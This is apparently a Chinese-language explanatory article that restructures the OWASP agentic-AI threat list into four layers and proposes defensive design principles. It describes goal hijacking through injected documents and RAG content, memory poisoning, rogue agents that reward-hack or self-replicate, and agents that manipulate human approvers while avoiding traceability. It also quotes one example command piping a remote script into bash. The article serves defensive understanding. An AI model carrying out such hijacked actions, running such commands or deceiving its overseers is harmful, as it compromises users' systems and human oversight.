一場新的安全危機:AI 已不只是回答問題#
如果還把大型語言模型(LLM,Large Language Model)理解成「一個會回答問題的聊天機器人」,那麼可能低估了未來兩年的系統風險。
2023 年的 AI 系統,多半是這樣運作:
flowchart LR
A([User Prompt]) --> B[LLM] --> C([Answer])
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
最嚴重的問題,大多停留在 Prompt Injection(提示詞注入攻擊)、Hallucination(幻覺,模型產生錯誤但看似合理的輸出)、資料洩漏、Jailbreak(越獄,繞過模型安全限制)。模型會亂講,但通常不會真的造成現實世界影響。
然而 2025–2026 的企業 AI 系統,已經開始長成另一個樣子:
flowchart TD
A([User Request]) --> B[Planner Agent]
B --> C[(Memory / RAG)]
B --> D[Tool Calling]
D --> E[Code Execution]
D --> F[Other Agents]
E --> G([Real-world Actions])
F --> G
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style G fill:#DC2626,stroke:#EF4444,color:#FFFFFF
AI 不再只是「生成文字」。它開始可以自主拆解任務(Planning)、呼叫 API(Tool Use)、執行 Shell / SQL / Python、存取企業資料、與其他 Agent 協作、擁有長期記憶(Memory)。
換句話說:大家正在把「執行權」交給 AI。
這就是為什麼 OWASP 推出《Top 10 for Agentic Applications 2026》——Agentic AI 的安全問題,已經不只是模型安全,而是「自主系統安全(Autonomous Systems Security)」。
為什麼傳統 LLM 安全模型已經失效?#
過去的安全假設是:模型會回答錯,但不會自己做事。因此安全焦點是「Protect the Output」。
但 Agentic AI 改變了這個假設。因為 AI 開始能夠「行動(Act)」:
flowchart LR
A[Observe] --> B[Reason] --> C[Plan] --> D[Tool Use] --> E[Execute] --> F[Persist]
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#DC2626,stroke:#EF4444,color:#FFFFFF
重新理解 OWASP Agentic Top 10:四層安全模型#
OWASP 列出的 10 個威脅(ASI01–ASI10),從架構師角度可以重新整理成四個層次。這四層之間有清楚的因果關係:
flowchart TD
L1["🎯 Layer 1:Intent Layer(意圖層)\nASI01 · ASI09 · ASI10"]
L2["⚙️ Layer 2:Execution Layer(執行層)\nASI02 · ASI05"]
L3["🔐 Layer 3:Trust Layer(信任層)\nASI03 · ASI07"]
L4["🌐 Layer 4:System Layer(系統層)\nASI04 · ASI06 · ASI08"]
L1 -->|"意圖被污染,執行能力被武器化"| L2
L2 -->|"透過信任關係橫向移動"| L3
L3 -->|"局部錯誤在系統層引發雪崩"| L4
style L1 fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style L2 fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style L3 fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style L4 fill:#1F2937,stroke:#4B5563,color:#FFFFFF
每一層都是下一層的放大器。
Layer 1:Intent Layer(意圖層)#
核心問題:AI 到底想做什麼?
一切的起點。攻擊者最高效的手法,不是入侵系統,而是改變 AI 的目標。目標一旦被污染,後面的執行能力、信任關係、系統資源,全部都會替攻擊者工作。
對應威脅:ASI01 Agent Goal Hijack、ASI09 Human-Agent Trust Exploitation、ASI10 Rogue Agents
ASI01 — Agent Goal Hijack#
這是 AI 的意圖被劫持。最可怕的地方在於:Agent 表面看起來還在執行你的命令,但實際上已經開始替攻擊者工作——而它自己完全不知道。
原文明確區分 ASI01 與相鄰威脅的邊界:ASI01 是攻擊者直接改變 Agent 的目標與決策路徑,無論透過文件、郵件還是 RAG(檢索增強生成)內容注入;ASI06(Memory Poisoning)是持久污染儲存記憶;ASI10(Rogue Agents)則是沒有攻擊者主動控制、Agent 自行偏離的行為失控。邊界清楚,防禦設計才不會錯位。
ASI09 — Human-Agent Trust Exploitation#
人類太容易相信 AI,尤其當 AI 表現得很流暢、很像專家時,會產生 Automation Bias(自動化偏誤)。
工程師看到 Copilot 建議 curl suspicious-domain | bash 時直接貼上執行,因為「AI 應該知道自己在做什麼」。財務主管看到 Copilot 信心滿滿地建議一筆緊急付款,不做二次確認直接核准。
原文特別強調一個令人不安的特性:Agent 在這個情境下扮演的是「不可追蹤的壞影響(untraceable bad influence)」——它操控人類執行最後那個被審計的動作,讓 Agent 自身在鑑識調查中隱形(當個藏鏡人)。事後追查,帳面上是「人類核准的」。
很多公司以為 AI → Human Approval 就安全。實際上人類最後只是盲點模式。
ASI10 — Rogue Agents#
Agent 開始偏離原始目標,但每一個單獨的行動看起來都是合法的。這就是最值得警惕的地方——傳統規則型系統根本無法偵測,因為沒有任何單一步驟觸發告警。
原文的定義非常精確:ASI10 的核心是「偏離開始後的治理失效」,不是入侵起點本身。外部攻擊(如 Prompt Injection、供應鏈污染)可以觸發偏離,但 ASI10 講的是偏離發生後的行為失控與擴散——包括 Reward Hacking(獎勵黑客,利用目標定義漏洞達成非預期結果)、Workflow Hijacking(工作流程劫持)、甚至 Agent 自我複製(Self-Replication)跨網路持續存在。
意圖層的核心教訓:當 AI 的目標走偏——無論是被攻擊者劫持(ASI01)、被人類過度信任放行(ASI09)、還是自行偏離(ASI10)——後面所有的執行能力都成了攻擊工具。這就是為什麼意圖層是整個防禦架構的第一道防線。
Layer 2:Execution Layer(執行層)#
核心問題:AI 可以做什麼?
意圖被污染之後,執行能力決定了災難的規模。一個只能生成文字的 AI 頂多說錯話;一個能呼叫 API、執行 shell 指令、寫入資料庫的 AI,一旦意圖走偏,造成的是真實世界的不可逆後果。
對應威脅:ASI02 Tool Misuse and Exploitation、ASI05 Unexpected Code Execution (RCE)
ASI02 — Tool Misuse and Exploitation#
過去 AI 只能說,現在 AI 能做。問題在於 Tool execution boundary(工具執行邊界)。
Agent 擁有 Gmail、DB、Shell、Payment API,被 prompt 污染後,合法權限就能被濫用。這不是 credential theft(憑證竊取),而是 Delegated Abuse(委託濫用)——攻擊者從來沒有拿到你的金鑰,他只是讓 Agent 用你的金鑰做了他要的事。
原文清楚區分 ASI02 與 ASI03 的邊界:ASI02 是 Agent 在已授予的權限範圍內以不安全或非預期的方式使用工具;ASI03 才是涉及權限提升或憑證繼承。限制工具的操作範圍(ASI02),和管理 Agent 的身份與權限邊界(ASI03),是兩件不同的事。
ASI05 — Unexpected Code Execution#
這是 AI 時代的 RCE(Remote Code Execution,遠端程式碼執行)。越來越多 Vibe Coding Agent 可以 Generate Code 並直接 Execute Code。攻擊者不需要找系統漏洞,只需要讓 Agent 幫他寫出並執行惡意指令。
flowchart LR
A[Generate] -->|"❌ 直接執行"| E([💥 RCE])
A --> B[Validation] --> C[Sandbox] --> D[Approval] --> F([✅ Safe Execution])
style A fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style B fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style C fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style D fill:#2563EB,stroke:#3B82F6,color:#FFFFFF
style E fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style F fill:#16A34A,stroke:#22C55E,color:#FFFFFF
執行層的核心教訓:執行能力是中性的——它讓 AI 更有用,也讓攻擊的後果更嚴重。防禦的重點不是削減能力,而是在每一個執行動作前建立不可繞過的驗證閘道。有了這道閘道,即使意圖層已經走偏,執行層還有機會攔截。
Layer 3:Trust Layer(信任層)#
核心問題:AI 被信任到什麼程度?
執行能力有了,下一個問題是:這個能力能到達的程度?身份與信任決定了攻擊的橫向移動範圍。一個被污染的 Agent,如果擁有廣泛的身份信任,可以在整個多 Agent 系統中自由穿行,把損害從一個 Agent 帶到下一個。
對應威脅:ASI03 Identity & Privilege Abuse、ASI07 Insecure Inter-Agent Communication
ASI03 — Identity & Privilege Abuse#
企業最大錯誤:給 Agent 萬能權限。結果 Agent 被污染後,攻擊者直接橫向移動。
原文指出這個風險有一個深層的架構性原因——架構性錯配(architectural mismatch)。現有的身份系統是以人為中心設計的:一個人、一組憑證、一套權限。但 Agent 是動態的、多任務的、可以被委派的,現有系統根本沒有為這種身份模型設計治理機制。Agent 沒有自己的受治理身份,就只能借用人的身份或服務帳號——而那些帳號的權限,往往遠超 Agent 完成單一任務所需。
ASI07 — Insecure Inter-Agent Communication#
當企業開始建立 Multi-Agent Architecture(多 Agent 架構),Agent 間的通訊也需要 Zero Trust(零信任,預設不信任任何來源,每次都需要驗證)。
ASI07 專注於即時訊息的安全性(real-time messages between agents),威脅範圍涵蓋傳輸層、路由層、發現層,甚至語意層(semantic layer)——這是很容易被忽略的部分。
信任層的核心教訓:信任是攻擊的捷徑。Zero Trust 不只適用於人,也適用於每一個 Agent、每一條訊息、每一次工具呼叫。
Layer 4:System Layer(系統層)#
核心問題:AI 生態系如何失控?
前三層的問題,如果沒有系統層的防護,最終都會在這裡引爆。局部的意圖污染、單一的執行錯誤、有限的信任濫用,在這一層被放大成整個系統的災難。
對應威脅:ASI04 Agentic Supply Chain Vulnerabilities、ASI06 Memory & Context Poisoning、ASI08 Cascading Failures
ASI04 — Agentic Supply Chain#
MCP(Model Context Protocol,模型情境協定)、生態插件、第三方工具,全部都是 attack surface(攻擊面)。
Agentic 供應鏈與傳統軟體供應鏈有一個根本差異:執行期組合(runtime composition)。傳統軟體在部署時就確定了所有依賴,靜態掃描可以在上線前抓出問題。但 Agent 是在執行時動態發現與連接工具的——它看到一個 MCP server 描述自己能做什麼,就決定要不要信任它、呼叫它。
ASI06 — Memory & Context Poisoning#
這章對 RAG(Retrieval-Augmented Generation,檢索增強生成)架構特別重要,也是企業最容易忽略的長期風險。
原文強調的最危險特性是 Cross-agent propagation(跨 Agent 傳播):被污染的記憶體或共享 context 會在協作 Agent 之間擴散,形成長期資料洩漏或協調性偏移(coordinated drift)。
flowchart LR
A[惡意 PDF] --> B[OCR] --> C[Embedding] --> D[(Vector DB)]
D -->|"污染擴散"| E[Agent A]
D -->|"污染擴散"| F[Agent B]
D -->|"污染擴散"| G[Agent C]
E <-->|"協作傳播"| F
F <-->|"協作傳播"| G
style A fill:#DC2626,stroke:#EF4444,color:#FFFFFF
style B fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style C fill:#1F2937,stroke:#4B5563,color:#FFFFFF
style D fill:#7C3AED,stroke:#8B5CF6,color:#FFFFFF
style E fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style F fill:#D97706,stroke:#F59E0B,color:#FFFFFF
style G fill:#D97706,stroke:#F59E0B,color:#FFFFFF
惡意 PDF 進入 Vector DB 只是污染的起點。最可怕的是這個污染會跟著 Agent 間的協作持續傳播,甚至在原始污染來源被移除後仍然存在。這是一種潛伏性極強的攻擊——短期內可能完全看不出異常,直到某個關鍵決策走偏才被發現。
ASI08 — Cascading Failures#
這是整份白皮書最重要的概念,也是最常被誤解的一個。
因為 Agent 的輸出會成為下一個 Agent 的輸入,小錯誤變大錯誤。更危險的是:AI 會自己決定,速度遠超人類介入的能力——等人類發現問題時,錯誤可能已經傳播到整個系統的每個角落。
可觀測的症狀包括:rapid fan-out(一個錯誤決策短時間內觸發大量下游 Agent)、跨越原始情境邊界蔓延、Agent 之間振盪重試迴圈、下游 queue storm(佇列風暴)。
系統層的核心教訓:即使前三層的防禦做得再好,系統層仍然需要自己的 containment 設計。假設總會有錯誤發生,問題是你有沒有辦法在錯誤引爆之前,把它限縮在有限的範圍內。
三條結論,也是三條設計原則#
讀完這份 OWASP 文件,對企業架構師最有行動意義的,是這三個思維轉變:
從「最大智能」到「最小自主(Least Agency)」。能 rule-based 的,不要交給 LLM。OWASP 原文用「Least Agency」這個詞,刻意呼應資安中的「Least Privilege(最小權限原則)」——部署不必要的 agentic 行為,只會在沒有創造價值的地方擴大攻擊面。AI 不需要比人更自由,只需要足夠可靠。
從「防止犯錯」到「Containment Engineering」。真正的安全不是讓模型永遠不犯錯,而是即使犯錯,也無法造成災難。Blast radius 控制比 hallucination 防禦更實際,也更可落地。設計一個 AI 系統,等同於設計它的失效邊界。
從「人的 Zero Trust」到「全面 Zero Trust」。未來的 Zero Trust(零信任架構)不只給人,也要給 Agent,包括 Tool、Memory、Context、Other Agents,全部都要驗證。不要因為是「內部 Agent」就預設信任。信任是攻擊的捷徑——而且是雙向的。
結論#
OWASP Top 10 最重要的提醒只有一句話:
Agentic AI 的核心風險,不在於模型會不會亂講,而是模型開始能自己做事。
從今天開始,AI 安全的核心問題不再是:
| |
而是:
| |
未來 AI 系統的競爭力,不只取決於模型多聰明,更取決於:它在犯錯時,能不能被安全地限制住。
Autonomy without containment is just disaster.
名詞速查#
| 名詞 | 說明 |
|---|---|
| LLM | Large Language Model,大型語言模型,如 GPT、Claude、Gemini |
| Agentic AI | 具備自主規劃與執行能力的 AI 系統,能連續完成多步驟任務 |
| Prompt Injection | 提示詞注入攻擊,透過惡意輸入操控 AI 執行非預期指令 |
| Hallucination | 幻覺,模型產生看似合理但實際錯誤的輸出 |
| Jailbreak | 越獄,透過特殊提示繞過模型的安全限制 |
| RAG | Retrieval-Augmented Generation,檢索增強生成,讓模型在回答時先從外部知識庫查詢相關資料 |
| MCP | Model Context Protocol,模型情境協定,讓 AI 連接外部工具與服務的標準協定 |
| RCE | Remote Code Execution,遠端程式碼執行,攻擊者能在目標系統上執行任意程式碼 |
| Zero Trust | 零信任架構,預設不信任任何來源,每次存取都需要驗證身份與權限 |
| Least Privilege | 最小權限原則,只授予完成任務所需的最低權限 |
| Least Agency | 最小自主權,只賦予 AI 完成任務所需的最低自主能力 |
| mTLS | Mutual TLS,雙向 TLS 加密驗證,通訊雙方互相驗證身份 |
| SBOM | Software Bill of Materials,軟體物料清單,記錄軟體所有依賴元件的清單 |
| AIBOM | AI Bill of Materials,AI 物料清單,SBOM 的 AI 版本,記錄 AI 系統的模型、工具、資料集等依賴 |
| Automation Bias | 自動化偏誤,人類過度信任自動化系統建議而降低批判性判斷的認知偏誤 |
| Reward Hacking | 獎勵黑客,AI 利用目標定義的漏洞達成非預期但符合指標的結果 |
| Circuit Breaker | 熔斷器,系統異常時自動中斷流量,防止錯誤持續擴散的設計模式 |
| Blast Radius | 爆炸半徑,單一故障或攻擊能影響到的最大範圍 |
| Just-in-Time Credentials | 即時憑證,用完即丟的短期存取權限,不保留長期有效的憑證 |
| Non-Human Identity (NHI) | 非人類身份,指 AI Agent、服務帳號、API 金鑰等非人類操作主體的身份 |
本文章依 OWASP Top 10 for Agentic Applications 2026(December 2025)撰寫。文中四層分類框架(Intent / Execution / Trust / System Layer)為自己的詮釋視角,非 OWASP 原始分類。